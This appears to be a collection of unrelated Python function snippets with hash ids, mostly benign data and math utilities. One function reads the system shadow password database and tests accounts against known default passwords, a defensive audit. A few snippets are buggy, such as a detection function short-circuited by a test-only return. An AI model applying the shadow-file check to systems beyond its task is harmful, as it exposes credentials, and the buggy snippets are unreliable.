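print(fib(80))  # fast: each fib(k) is computed once and cached by its args tuple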
def intify_and_make_intron(junction):
    """Convert start and stop strings to ints and shorten the interval.

    The interval is shortened to match the introns of SJ.out.tab files
    from STAR.

    Parameters
    ----------
    junction : tuple
        (chrom, start, stop, strand) tuple of strings,
        e.g. ('chr1', '100', '200', '-')

    Returns
    -------
    intron : tuple
        (chrom, start, stop, strand) tuple of string, int, int, string.
        Adds 1 to original start and subtracts 1 from original stop.

    >>> intify_and_make_intron(('chr1', '100', '200', '-'))
    ('chr1', 101, 199, '-')
    """
    chrom, start, stop, strand = junction
    start = int(start) + 1
    stop = int(stop) - 1
    return chrom, start, stop, strand
200a8504e0a28194ea70fe9e9702094b6ddeb1f1
24,640
def get_value_for_key_from_json(key, data_structure):
    """
    Given a data_structure, return the *first* value of the key found in
    the first dict by recursive search.

    example:
        data_structure: [{"id": 1, "name": "name1"}, {"id": 2, "name": "name2"}]
        key: "id"
        returns 1

    :param key: key of a dict of which to return the value
    :param data_structure: python data_structure
    :return: value of key in first dict found
    """
    if isinstance(data_structure, list):
        for v in data_structure:
            r = get_value_for_key_from_json(key, v)
            if r is not None:
                return r
        return None
    elif isinstance(data_structure, dict):
        if key in data_structure:
            return data_structure[key]
        for k in data_structure:
            v = data_structure[k]
            r = get_value_for_key_from_json(key, v)
            if r is not None:
                return r
        return None
071d6c771d750bdef99a209ba537d0709c1d9582
24,641
import pickle


def predict(dataX):
    """Predict dependent variable from a features vector."""
    # load model
    model = pickle.load(open('model.pickle', 'rb'))
    # predict
    predY = model.predict(dataX.values.reshape(-1, dataX.shape[1]))
    return predY
85505d3435ad8593542851680aef7491058a0239
24,642
def format_pci_addr(pci_addr):
    """Pad a PCI address, e.g. 0:0:1.1 becomes 0000:00:01.1.

    :param pci_addr: str
    :return pci_addr: str
    """
    domain, bus, slot_func = pci_addr.split(':')
    slot, func = slot_func.split('.')
    return '{}:{}:{}.{}'.format(domain.zfill(4), bus.zfill(2),
                                slot.zfill(2), func)
9da677c2f1ff832cfbe86f19dffcada1fb33003a
24,643
def process_groups(group_file):
    """
    Read in a comma-delimited file of dataset groups and format them as a
    list of lists.
    """
    datasets = []
    with open(group_file, 'r') as f:
        for line in f:
            line = line.strip()
            datasets.append(line.split(","))
    return datasets
1ba72902742aad5b46128c436d1023d4ee519d80
24,644
import re


def make_url_pattern(url: str, version: str) -> str:
    """Returns a regular expression for matching versioned download URLs.

    Args:
        url: Existing download URL for `version`.
        version: Version corresponding to `url` (must be a substring).

    Returns:
        Regular expression that matches URLs similar to `url`, where all
        instances of `version` are replaced by match groups.
    """
    replacement_temp = 'XXXXXXXXXXXXXXX'
    return re.escape(url.replace(version, replacement_temp)).replace(
        replacement_temp, '([^/"\']+)')
384a58bf8ef02b75f510fe5884445e297862f0ef
24,647
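A hedged example of how the helper above could be used (the URL is made up), assuming make_url_pattern from the record is in scope:

import re

pattern = make_url_pattern('https://example.com/pkg/v1.2.3/pkg-1.2.3.tar.gz', '1.2.3')
m = re.fullmatch(pattern, 'https://example.com/pkg/v2.0.0/pkg-2.0.0.tar.gz')
print(m.groups())  # ('2.0.0', '2.0.0'): each version occurrence becomes a group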
import re


def parse_not_to_prune(model, config):
    """Returns a list of names of modules not to prune in the model."""
    patterns = [re.compile(s) for s in config.not_to_prune]
    parsed_not_to_prune = []
    for name, module in model.named_modules():
        if type(module).__name__ in config.prune_layer_types:
            if any(p.search(name) for p in patterns):
                parsed_not_to_prune.append(name)
    return parsed_not_to_prune
71e56a5c3d9a2502e8309225feeb127b8b98f7eb
24,648
def getListePions(c):
    """
    Return the list of pawns on the board.

    parameter: c, a board
    """
    return c['pions']
e4711415abf685b430596143803ece982183ba9c
24,649
import requests


def internet_on():
    """Check if connected to the Internet."""
    try:
        requests.get('https://google.com', timeout=4)
        return True
    except requests.ConnectionError:
        return False
fe53cf6d42dbdde0b4040eafea89184539ef7e24
24,650
def right(x):
    """Helper function: argument x must be a dot. Returns the dot right of x."""
    return (x[0] + 1, x[1])
bbb9b16ddbecd8bb452d941e5a871c9799f2ca7a
24,651
def isMatch(peak, biomarker, tolerance):
    """Check if a spectral peak matches a protein biomarker.

    Args:
        peak: Spectral peak obtained from experiment, float
        biomarker: An array of biomarker values
        tolerance: Maximal difference between experimental weight and
            theoretical one that could be considered a match, float

    Return:
        True / False
    """
    for each in biomarker:
        if abs(float(peak) - each) <= float(tolerance):
            return True
    return False
a81a67deca75a4d41c17707dc2e8e528c8fc3949
24,654
def metadata_format(metadata):
    """Formats metadata extracted from a .tif file."""
    metadata_dic = {
        'Channel 1 Parameters': {'ExcitationWavelength': 0.0, 'EmissionWavelength': 0.0},
        'Channel 2 Parameters': {'ExcitationWavelength': 0.0, 'EmissionWavelength': 0.0},
        'Channel 3 Parameters': {'ExcitationWavelength': 0.0, 'EmissionWavelength': 0.0},
        'Channel 4 Parameters': {'ExcitationWavelength': 0.0, 'EmissionWavelength': 0.0},
        'refr_index': 0.0,
        'num_aperture': 0.0,
        'pinhole_radius': 0.0,
        'magnification': 0.0,
        'Axis 3 Parameters Common': {'EndPosition': 0.0, 'StartPosition': 0.0, 'MaxSize': 0.0},
        'Axis 0 Parameters Common': {'EndPosition': 0.0, 'StartPosition': 0.0, 'MaxSize': 0.0},
    }
    # read excitation/emission per channel; the emission keys follow the same
    # [ChannelNParameters] pattern as the excitation keys
    for ch in range(1, 5):
        channel = 'Channel %d Parameters' % ch
        metadata_dic[channel]['ExcitationWavelength'] = float(
            metadata['[Channel%dParameters]ExcitationWavelength' % ch])
        metadata_dic[channel]['EmissionWavelength'] = float(
            metadata['[Channel%dParameters]EmissionWavelength' % ch])
    metadata_dic['num_aperture'] = float(metadata['ObjectiveLensNAValue'])
    metadata_dic['pinhole_radius'] = float(metadata['PinholeDiameter']) / 2
    metadata_dic['magnification'] = 0.75
    metadata_dic['refr_index'] = 1.5
    metadata_dic['Axis 3 Parameters Common']['EndPosition'] = float(metadata['[Axis3ParametersCommon]EndPosition'])
    metadata_dic['Axis 3 Parameters Common']['StartPosition'] = float(metadata['[Axis3ParametersCommon]StartPosition'])
    metadata_dic['Axis 3 Parameters Common']['MaxSize'] = float(metadata['[Axis3ParametersCommon]MaxSize'])
    metadata_dic['Axis 0 Parameters Common']['MaxSize'] = float(metadata['[Axis0ParametersCommon]MaxSize'])
    metadata_dic['Axis 0 Parameters Common']['EndPosition'] = float(metadata['[ReferenceImageParameter]HeightConvertValue'])
    return metadata_dic
00bff49d004e650332512d5f1979b5d56dc74662
24,656
def create_stratum_name(stratification_name, stratum_name, joining_string="X"):
    """
    Generate a name string to represent a particular stratum within a
    requested stratification.

    :param stratification_name: str
        the "stratification" or rationale for implementing the current
        stratification process
    :param stratum_name: str
        name of the stratum within the stratification
    :param joining_string: str
        the character to add to the front to indicate that this string is
        the extension of the existing one.
        in SUMMER, capitals are reserved for non-user-requested strings,
        in this case "X" is used as the default
    :return: str
        the composite string for the stratification
    """
    return joining_string + "%s_%s" % (stratification_name, str(stratum_name))
d778f2538c3e9c451bcafba287ef34fcc5bed07b
24,658
import socket


def get_node_address(node_name=''):
    """
    Return the IP address associated with the node's domain.

    This is by no means perfect and should not be relied upon aside from
    testing purposes.
    """
    return socket.gethostbyname(socket.getfqdn(node_name))
d3f8b5c39118cf05e195d82430f024ef27d01c21
24,659
import time


def _translate_param_name_to_real_path_key(*args):
    """ """
    keys = list()
    keys.append(args[0].__name__)
    keys.append(args[1])
    try:
        keys.append(args[2])
    except IndexError:
        keys.append("Resource")
    keys.append(time.time() // (60 * 60 * 24))
    return keys
deb7e36e7f25264586e8fae15bea78702dba1ade
24,661
def extract_muMax(df_Annotations):
    """
    Extracts the growth rate (slope) for each sample.

    Parameters
    ----------
    df_Annotations : pandas.DataFrame
        The dataframe contains the results of a linear fit through the
        exponential growth phase.

    Returns
    -------
    df_mu : pandas.DataFrame
        A dataframe that shows the calculated maximal growth rate for
        each sample.
    """
    # Delete index name and transpose
    df_Annotations.index.name = None
    df_mu = df_Annotations.T

    # Keep only sample name and slope
    df_mu.reset_index(inplace=True)
    df_mu = df_mu.rename(columns={"index": "samplename_OD"})
    df_mu = df_mu[["samplename_OD", "Slope"]]
    df_mu["samplename_OD"] = df_mu["samplename_OD"].str[:6]

    # Rename slope
    df_mu.rename(columns={"Slope": "mu[/h]"}, inplace=True)
    return df_mu
63ca33ddf29c0bfc1ee1af49ef5b6ad4f89829ff
24,663
def _parse_system_prop(line):
    """Returns the name and value of a system property
    (the line is preceded by @).

    Args:
        line (str): The definition of the system property.

    Returns:
        str, str: Pair of name, value.
    """
    return line[1:].split("#")[0].split("=")
f2822175a717f9ee96524438eaa610898f7fb613
24,664
def pentad_to_month_day(p):
    """
    Given a pentad number, return the month and day of the first day in
    the pentad.

    :param p: pentad number from 1 to 73
    :type p: integer
    :return: month and day of the first day of the pentad
    :rtype: integer
    """
    assert 0 < p < 74, 'p outside allowed range 1-73 ' + str(p)
    m = [1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3,
         4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6,
         7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9,
         10, 10, 10, 10, 10, 10, 11, 11, 11, 11, 11, 11,
         12, 12, 12, 12, 12, 12]
    d = [1, 6, 11, 16, 21, 26, 31, 5, 10, 15, 20, 25,
         2, 7, 12, 17, 22, 27, 1, 6, 11, 16, 21, 26,
         1, 6, 11, 16, 21, 26, 31, 5, 10, 15, 20, 25, 30,
         5, 10, 15, 20, 25, 30, 4, 9, 14, 19, 24, 29,
         3, 8, 13, 18, 23, 28, 3, 8, 13, 18, 23, 28,
         2, 7, 12, 17, 22, 27, 2, 7, 12, 17, 22, 27]
    return m[p - 1], d[p - 1]
183c3954fe6ee003af28ca13d2a2207812d66483
24,665
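A quick sanity check of the lookup tables above, assuming pentad_to_month_day from the record is in scope:

print(pentad_to_month_day(1))   # (1, 1): pentad 1 starts on 1 January
print(pentad_to_month_day(37))  # (6, 30): pentad 37 starts on 30 June
print(pentad_to_month_day(73))  # (12, 27): the last pentad of the year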
def isMobile(request):
    """
    Detect whether the connection comes from a mobile device.
    """
    return False  # IMPORTANT: remove this, testing only.
    mobile_browser = False
    ua = request.META['HTTP_USER_AGENT'].lower()[0:4]
    if ua in mobile_uas:
        mobile_browser = True
    else:
        for hint in mobile_ua_hints:
            if request.META['HTTP_USER_AGENT'].lower().find(hint.lower()) > 0:
                mobile_browser = True
    return mobile_browser
3564e51b20baa4cd800581cc1195dc23ecda2829
24,668
def check_column_uniformity(dataframe, colname):
    """
    Check uniformity of a column. Useful when ensuring merges worked
    correctly.

    :param dataframe: dataframe containing the column to check
    :param colname: name of the column to check
    :return: None
    """
    if colname in dataframe.columns:
        unique_col_values = dataframe[colname].unique()
        num_unique_values = len(unique_col_values)
        assert num_unique_values == 1, \
            'There are {} unique values for {}: \n {}'.format(
                num_unique_values, colname, unique_col_values)
    return None
db4225375524a48fe17922172764e7c700aeb526
24,672
import threading


def threaded(function):
    """Helper for threading. 'function' is the decorated function."""
    def wrapper(*args):
        """Thread wrapper. 'args' is the arguments of the decorated function."""
        thread = threading.Thread(target=function, args=args)
        thread.start()
    return wrapper
5404eb2f04180a37ad9b1dfef6b752786d052637
24,673
import random


def construct_positive_and_negative_pairs(concept_list, synonym_pairs, neg_posi_rate):
    """
    Returns positive pairs and negative pairs. The number of negative
    samples is neg_posi_rate times the number of synonym pairs
    (positive samples).
    """
    negative_pairs = []
    for mention, _ in synonym_pairs:
        for _ in range(neg_posi_rate):
            concept = random.sample(concept_list, 1)[0]
            # avoid overlapping with known pairs
            while (mention, concept) in synonym_pairs or (mention, concept) in negative_pairs:
                concept = random.sample(concept_list, 1)[0]
            negative_pairs.append((mention, concept))
    return synonym_pairs, negative_pairs
da0a7354e23941718cf7d1c5fdeda23497ebe032
24,675
import numpy


def selectChannel(weights, weightIndexToNodeLUT):
    """
    Randomly selects a counterparty based on weights according to a LUT.
    Returns the node id (or -1 if none could be found).

    Parameters
    ----------
    weights: a list of weights to be used for normalizing the random selection
    weightIndexToNodeLUT: a LUT translating the weights list to node ids
    """
    rand = numpy.random.rand()
    totalWeight = sum(weights)
    sumWeights = 0
    counterparty = -1
    for index, weight in enumerate(weights):
        sumWeights += weight
        if totalWeight == 0:
            sumWeights = 0
        elif sumWeights / totalWeight >= rand:
            counterparty = weightIndexToNodeLUT[index]
            break
    return counterparty
4d62306297ab20923b75d014527cb2d1f174fa13
24,677
def balance_from_utxos(utxos):
    """Return the balance of a list of utxos.

    Args:
        utxos: A list of utxos with the following format.
            [{
                txid: '',
                value: 0,
                vout: 0,
                scriptPubKey: '',
            }]

    Returns:
        The sum of the utxos' values.
    """
    balance = 0
    if utxos:
        balance = sum(utxo['value'] for utxo in utxos)
    return balance
e20373db24483bb33189b396da44b2c453b717d9
24,678
def next_key(key):
    """Calculates the next partition value of a key.

    Note: Cassandra BOP orders 'b' before 'aa'.

    Args:
        key: A string containing a Cassandra key.

    Returns:
        A string containing the next partition value.
    """
    mutable_key = list(key)
    mutable_key[-1] = chr(ord(key[-1]) + 1)
    return ''.join(mutable_key)
dd9b076e9f4a916ff4f8520596d4d1386497937e
24,679
def remain_tags_space(text, tags_space):
    """
    :param tags_space: tags to be retained, e.g.
        { "ruby on rails": "ruby_on_rails", ... }
    """
    for tag in tags_space:
        text = text.replace(tag, tags_space[tag])
    return ['_'.join(tag.split()) for tag in tags_space]
97a9075f868d363a772797cf9c333392baa9e9e5
24,680
def export_annual_result(donations):
    """Export and aggregate the entire year's results."""
    money = 0
    donators = 0
    report = ''
    report += "%d days of donations\n" % len(donations.keys())
    for k in donations.keys():
        money += donations[k]['sum']
        donators += donations[k]['quantity']
    report += "Total donations: %d\nTotal donators: %d" % (money, donators)
    return report
9772e6bfa459b6201dec16f65f2cf73b5f41a32c
24,681
import os


def isUnzippedEgg(path):
    """
    Check whether a filesystem path points to an unzipped egg;
    z3c.autoinclude does not support zipped eggs or python libraries that
    are not packaged as eggs. This function can be called on e.g. entries
    in sys.path or the location of a distribution object.
    """
    return os.path.isdir(path)
74997d2707da97c8b22a529f2fc5d06d6141f1f4
24,684
from collections import Counter


def most_common_letter(s: str) -> str:
    """Returns the most common letter in a string."""
    return Counter(s).most_common(1)[0][0]
9cf0d1fb6790a2f5a72dff976423868c0dce9a89
24,685
def findpos(M, x):
    """See figure 9 in reference."""
    if x.is_text() or x.is_attribute():
        return 0
    y = x.parent
    children = y.elements()

    # find the rightmost in-order node left of x (v)
    index = children.index(x)
    v = None
    for i in range(index):
        c = children[i]
        if c.inorder:
            v = c
    if v is None:
        return 1
    u = M.right[v]
    children = u.parent.elements()
    index = children.index(u) + 1
    return index + 1
168072d6a21d916af09039fbc898cf9b2793ea5c
24,692
def dim_in_bnd(x, dim, a, b):
    """Dimension-between-bounds indicator function."""
    z = x[dim]
    sup_a = a < z
    inf_b = z < b
    res = sup_a * inf_b
    return res
3db1788d02843d01b7975523f28f253e77d510d3
24,693
import os


def find_version(package):
    """Read package version string from __init__.py."""
    with open(os.path.join(package, '__init__.py')) as fid:
        for line in fid.readlines():
            if line.startswith('__version__'):
                line = line[:line.find('#')]  # strip comment, if any
                version = line.split('=', 2)[1].strip()
                if version[0] != version[-1] or version[0] not in "\"'":
                    break
                return version[1:-1]
    raise RuntimeError("Could not read version from %s/__init__.py" % package)
b6c28439e68f7d292142ce02f9e4644f199e4651
24,694
def captcha_halfway(numbers):
    """Sum the digits that match the one halfway around a cyclic string."""
    total = 0
    half = len(numbers) // 2
    for i in range(half):
        if numbers[i] == numbers[i + half]:
            total += int(numbers[i])
    return total * 2
c772c194c038484c144337dd32d93ab74e1d9370
24,696
def get_all_regions(config):
    """Retrieve a set of all regions used by the declared integration tests."""
    regions = set()
    for feature in config.get("test-suites").values():
        for test in feature.values():
            for dimensions_config in test.values():
                for dimensions_group in dimensions_config:
                    regions.update(dimensions_group.get("regions", []))
    return regions
c2dfddc73601f3661f482cf0ed5547b9b8434689
24,697
def RSI(prices):
    """
    Relative Strength Index.

    1. The gain on a day when the price closes above the previous day's
       price is the U (up) value.
    2. The loss on a day when the price closes below the previous day's
       price is the D (down) value.
    3. The averages of the U and D values are called AU (average ups)
       and AD (average downs).
    4. AU divided by AD is the RS (relative strength) value. A large RS
       means the gains over the period outweighed the losses.
    5. The RSI is then computed as:
       RSI = RS / (1 + RS)
       RSI = AU / (AU + AD)
    """
    list_length = len(prices)
    u_list = []
    u_sum = 0
    d_list = []
    d_sum = 0
    try:
        for i in range(1, list_length):
            if prices[i] > prices[i - 1]:
                # day when the price rose above the previous day's price
                u_list.append(prices[i] - prices[i - 1])
                u_sum = u_sum + (prices[i] - prices[i - 1])
            elif prices[i] < prices[i - 1]:
                # day when the price fell below the previous day's price
                d_list.append(prices[i - 1] - prices[i])
                d_sum = d_sum + (prices[i - 1] - prices[i])
            else:
                pass
        if len(u_list) == 0:
            return 0
        else:
            AU = u_sum / len(u_list)
        if len(d_list) == 0:
            AD = 0
        else:
            AD = d_sum / len(d_list)
        return AU / (AU + AD)
    except ZeroDivisionError:
        return 0
33e18b915813be93c41bf09edc110f64e93e89a1
24,698
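An illustrative run of the RSI computation above (the price list is made up), assuming RSI from the record is in scope:

prices = [10, 11, 12, 11, 13]
# ups: 1, 1, 2 -> AU = 4/3; downs: 1 -> AD = 1
# RSI = AU / (AU + AD) = (4/3) / (7/3) ~= 0.571
print(round(RSI(prices), 3))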
def keras_name_to_tf_name_block(keras_name,
                                keras_block='block1a',
                                tf_block='blocks_0',
                                use_ema=True,
                                model_name_tf='efficientnet-b0'):
    """Map a name in the h5 file to a name in the ckpt that belongs to a block.

    We map the name keras_name that points to a weight in the h5 file to
    the name of the corresponding weight in the ckpt file.

    Args:
        keras_name: str, the name of a weight in the h5 file of the keras
            implementation
        keras_block: str, the block name for the keras implementation
            (e.g. 'block1a')
        tf_block: str, the block name for the tf implementation
            (e.g. 'blocks_0')
        use_ema: Bool, whether to use the ExponentialMovingAverage result
            in the ckpt
        model_name_tf: str, the name of the model in the ckpt.

    Returns:
        String for the name of the weight as in the ckpt file.

    Raises:
        ValueError if keras_block does not show up in keras_name.
    """
    if keras_block not in keras_name:
        raise ValueError('block name {} not found in {}'.format(
            keras_block, keras_name))

    # all blocks in the first group will not have expand conv and bn
    is_first_blocks = (keras_block[5] == '1')
    tf_name = [model_name_tf, tf_block]

    # depthwise conv
    if 'dwconv' in keras_name:
        tf_name.append('depthwise_conv2d')
        tf_name.append('depthwise_kernel')

    # conv layers
    if is_first_blocks:
        # first blocks only have one conv2d
        if 'project_conv' in keras_name:
            tf_name.append('conv2d')
            tf_name.append('kernel')
    else:
        if 'project_conv' in keras_name:
            tf_name.append('conv2d_1')
            tf_name.append('kernel')
        elif 'expand_conv' in keras_name:
            tf_name.append('conv2d')
            tf_name.append('kernel')

    # squeeze-excitation layers
    if '_se_' in keras_name:
        if 'reduce' in keras_name:
            tf_name.append('se/conv2d')
        elif 'expand' in keras_name:
            tf_name.append('se/conv2d_1')
        if 'kernel' in keras_name:
            tf_name.append('kernel')
        elif 'bias' in keras_name:
            tf_name.append('bias')

    # batch normalization layers
    if 'bn' in keras_name:
        if is_first_blocks:
            if 'project' in keras_name:
                tf_name.append('tpu_batch_normalization_1')
            else:
                tf_name.append('tpu_batch_normalization')
        else:
            if 'project' in keras_name:
                tf_name.append('tpu_batch_normalization_2')
            elif 'expand' in keras_name:
                tf_name.append('tpu_batch_normalization')
            else:
                tf_name.append('tpu_batch_normalization_1')

    for x in ['moving_mean', 'moving_variance', 'beta', 'gamma']:
        if x in keras_name:
            tf_name.append(x)
    if use_ema:
        tf_name.append('ExponentialMovingAverage')
    return '/'.join(tf_name)
6a249f992be1c1232ba8415523b8408be5680133
24,699
def _2set(src):
    """Convert to a set.

    Args:
        src (Any): a value of any type

    Returns:
        set: the resulting set
    """
    ret = src
    if not isinstance(src, set):
        ret = set()
        ret.add(src)
    return ret
1a6bc871ecda8f89364c02cc47b03e69d4c28d07
24,701
from pathlib import Path
import crypt
import spwd


def check_for_default_passwords(config_path):
    """
    Check if the 'pi' user's current password hash is in our list of
    default password hashes.
    """
    base_dir = Path(config_path)
    pass_hashes_file_path = base_dir.joinpath('pass_hashes.txt')
    # For deb installation.
    if not pass_hashes_file_path.is_file():
        base_dir = Path(__file__).resolve().parent.parent
        pass_hashes_file_path = base_dir.joinpath('misc/pass_hashes.txt')
    with pass_hashes_file_path.open() as f:
        read_data = f.read()

    known_passwords = {}
    for username_password in read_data.splitlines():
        username, password = username_password.split(':', maxsplit=1)
        pw = known_passwords.get(username, [])
        pw.append(password)
        known_passwords[username] = pw

    def hash_matches(pwdp, plaintext_password):
        i = pwdp.rfind('$')
        salt = pwdp[:i]
        crypted = crypt.crypt(plaintext_password, salt)
        return crypted == pwdp

    for shadow in spwd.getspall():
        encrypted_password = shadow.sp_pwdp
        for password in known_passwords.get(shadow.sp_namp, []):
            if hash_matches(encrypted_password, password):
                return True
    return False
cfad84c0e324538aa575bb3fe63cf66750739983
24,702
def power_num(number: float, power: int) -> float:
    """Raise the number to the power if number >= 0."""
    # The number can be int or float
    if not isinstance(number, int) and not isinstance(number, float):
        raise TypeError("The number can only be int or float")
    # The power can only be int
    if not isinstance(power, int):
        raise TypeError("The power can only be of int type")
    # If number >= 0, we compute the calculation
    if number >= 0:
        return round(number ** power, 2)
    raise TypeError("The number can only be >= 0")
8a54f3f48b9892e9f32a0789624a0a6a76a7029f
24,703
def chirp_mass_and_mass_ratio_to_total_mass(chirp_mass, mass_ratio):
    """
    Convert chirp mass and mass ratio of a binary to its total mass.

    Parameters
    ----------
    chirp_mass: float
        Chirp mass of the binary
    mass_ratio: float
        Mass ratio (mass_2/mass_1) of the binary

    Return
    ------
    total_mass: float
        Total mass of the binary
    """
    return chirp_mass * (1 + mass_ratio) ** 1.2 / mass_ratio ** 0.6
3a01820239a2eceeea35794d2cd5aa781bf59315
24,704
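The conversion above follows from the chirp-mass definition; a short derivation in the same notation (q = m2/m1, M = m1 + m2):

    M_c = (m1 * m2)^(3/5) / (m1 + m2)^(1/5) = M * q^(3/5) / (1 + q)^(6/5)

so M = M_c * (1 + q)^1.2 / q^0.6, matching the returned expression.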
def _format_version(name):
    """Formats the string name to be used in a --version flag."""
    return name.replace("-", "_")
9b0bb72d6cef2836dce1f6c0d167ba41ce5a487b
24,705
import math


def rho2_rho1(M, beta, gamma):
    """Density ratio across an oblique shock (eq. 4.8).

    :param <float> M: Mach # upstream
    :param <float> beta: Shock angle w.r.t initial flow direction (radians)
    :param <float> gamma: Specific heat ratio

    :return <float> Density ratio r2/r1
    """
    m1sb = M * math.sin(beta)
    n1 = (gamma + 1.0) * m1sb ** 2
    d1 = 2.0 + (gamma - 1.0) * m1sb ** 2
    return n1 / d1
20de69d2ac14100cd8c88e3f51eb14220052195b
24,706